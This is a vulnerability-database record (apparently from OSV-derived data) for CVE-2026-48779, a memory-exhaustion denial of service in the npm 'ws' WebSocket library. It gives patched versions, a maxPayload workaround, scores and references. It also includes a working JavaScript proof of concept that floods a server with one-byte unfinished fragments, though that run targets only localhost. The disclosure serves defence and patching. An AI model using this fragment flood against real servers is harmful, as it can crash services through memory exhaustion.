{"id":"CVE-2026-48779","aliases":["GHSA-96hv-2xvq-fx4p"],"url":"https://o3.security/vulnerability/CVE-2026-48779","summary":"ws: Memory exhaustion DoS from tiny fragments and data chunks","details":"### Impact\n\nA high volume of exceptionally small fragments and data chunks can be sent by a peer, with modest network traffic, to force the remote peer into allocating and holding structural wrappers that consume far more memory than the default documented message-size limit, leading to process termination due to OOM.\n\n### Proof of concept\n\n```js\nimport { WebSocket, WebSocketServer } from 'ws';\n\nconst wss = new WebSocketServer({ port: 0 }, function () {\n  const data = Buffer.alloc(1);\n  const options = { fin: false };\n  const { port } = wss.address();\n  const ws = new WebSocket(`ws://localhost:${port}`);\n\n  ws.on('open', function () {\n    (function send() {\n      ws.send(data, options, function (err) {\n        if (err) return;\n        send();\n      });\n    })();\n  });\n\n  ws.on('error', console.error);\n  ws.on('close', function (code, reason) {\n    console.log(`client close - code: ${code} reason: ${reason.toString()}`);\n  });\n});\n\nwss.on('connection', function (ws) {\n  ws.on('error', console.error);\n  ws.on('close', function (code, reason) {\n    console.log(`server close - code: ${code} reason: ${reason.toString()}`);\n  });\n});\n```\n\n### Patches\n\nThe vulnerability was fixed in ws@8.21.0 (https://github.com/websockets/ws/commit/bca91adf15677e47dbe4f959653452727be28b94) and backported to ws@7.5.11 (https://github.com/websockets/ws/commit/fd36cd864fcdf62a08273a99e19a7d975401fee8), ws@6.2.4 (https://github.com/websockets/ws/commit/86d3e8a5fb0246ed373860c5fbb0de88824a27f7), and ws@5.2.5 (https://github.com/websockets/ws/commit/b5372ac67bb97a773727b8e9f5035a8123556d53).\n\n### Workarounds\n\nIn vulnerable versions, the issue can be mitigated by lowering the value of the `maxPayload` option if possible.\n\n### Credits\n\nThe vulnerability was responsibly disclosed and fixed by [Nadav Magier](https://github.com/Nadav0077).","published":"2026-06-16T21:26:22.537Z","modified":"2026-09-15T17:11:44.707239917Z","cvss":{"score":7.5,"severity":"HIGH","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},"epss":{"score":0.00812,"percentile":0.55039,"asOf":"2026-09-15"},"cisaKev":null,"exploitsKnown":0,"affectedPackages":[{"ecosystem":"npm","name":"ws","fixedVersion":"5.2.5"},{"ecosystem":"npm","name":"ws","fixedVersion":"6.2.4"},{"ecosystem":"npm","name":"ws","fixedVersion":"7.5.11"},{"ecosystem":"npm","name":"ws","fixedVersion":"8.21.0"}],"fix":{"url":"https://github.com/websockets/ws/commit/86d3e8a5fb0246ed373860c5fbb0de88824a27f7","label":"websockets/ws@86d3e8a"},"references":[{"type":"WEB","url":"https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-48779.json"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:29197"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:33155"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:33160"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:33163"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:33173"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:33183"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:33574"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:34342"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:36754"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:36820"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:37272"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:40984"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:41928"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:41941"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:41944"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:48151"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:56366"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:56431"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:57013"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:57590"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:60520"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:65126"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:66488"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:66545"},{"type":"ADVISORY","url":"https://access.redhat.com/security/cve/CVE-2026-48779"},{"type":"ADVISORY","url":"https://github.com/CVEProject/cvelistV5/tree/main/cves/2026/48xxx/CVE-2026-48779.json"},{"type":"ADVISORY","url":"https://github.com/websockets/ws/security/advisories/GHSA-96hv-2xvq-fx4p"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-48779"},{"type":"REPORT","url":"https://bugzilla.redhat.com/show_bug.cgi?id=2489661"},{"type":"FIX","url":"https://github.com/websockets/ws/commit/86d3e8a5fb0246ed373860c5fbb0de88824a27f7"},{"type":"FIX","url":"https://github.com/websockets/ws/commit/b5372ac67bb97a773727b8e9f5035a8123556d53"},{"type":"FIX","url":"https://github.com/websockets/ws/commit/bca91adf15677e47dbe4f959653452727be28b94"},{"type":"FIX","url":"https://github.com/websockets/ws/commit/fd36cd864fcdf62a08273a99e19a7d975401fee8"},{"type":"PACKAGE","url":"https://github.com/websockets/ws"},{"type":"WEB","url":"https://access.redhat.com/errata/RHSA-2026:27171"},{"type":"WEB","url":"https://access.redhat.com/errata/RHSA-2026:26638"}],"provenance":{"sources":["OSV.dev","FIRST.org (EPSS)"],"lastVerified":"2026-09-15T17:11:44.707239917Z"}}